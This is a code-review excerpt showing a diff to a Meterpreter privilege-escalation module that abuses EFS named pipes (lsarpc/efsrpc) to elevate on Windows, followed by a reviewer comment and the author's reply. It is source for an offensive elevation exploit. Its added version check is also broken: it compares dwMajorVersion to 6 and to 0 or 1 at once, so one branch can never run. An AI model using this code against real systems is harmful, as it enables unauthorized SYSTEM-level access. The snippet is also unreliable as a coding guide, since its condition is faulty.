c/meterpreter/source/extensions/priv/namedpipe_efs.c

```diff
@@ -50,6 +50,22 @@ DWORD elevate_via_namedpipe_efs(Remote* remote, Packet* packet)
 			BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_efs: Windows versions older than 6.0 are unsupported");
 		}
 
+		// Windows Vista / Server 2008 (6.0 and 6.1) only supports \pipe\lsarpc endpoint
+		if (os.dwMajorVersion == 6 && (os.dwMajorVersion == 0 || os.dwMajorVersion == 1)) {
+			if (!does_pipe_exist(L"\\\\.\\pipe\\lsarpc")) {
+				BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_efs: \\pipe\\lsarpc is not listening.");
+			}
+			wEndpointUUID = &LSARPC_PIPE_MS_EFSR_UUID;
+			wNamedPipeEndpoint = &LSARPC_NAMEDPIPE;
+		}
+		else {
+			if (!does_pipe_exist(L"\\\\.\\pipe\\efsrpc")) {
+				BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_efs: \\pipe\\efsrpc is not listening.");
+			}
+			wEndpointUUID = &EFSRPC_PIPE_MS_EFSR_UUID;
+			wNamedPipeEndpoint = &EFSRPC_NAMEDPIPE;
```

Comment:
We still don't start the EFS service here in the event the pipe isn't available?

Reply:
I'll fix that in next commit 👍 will check service status and start that if it was stopped.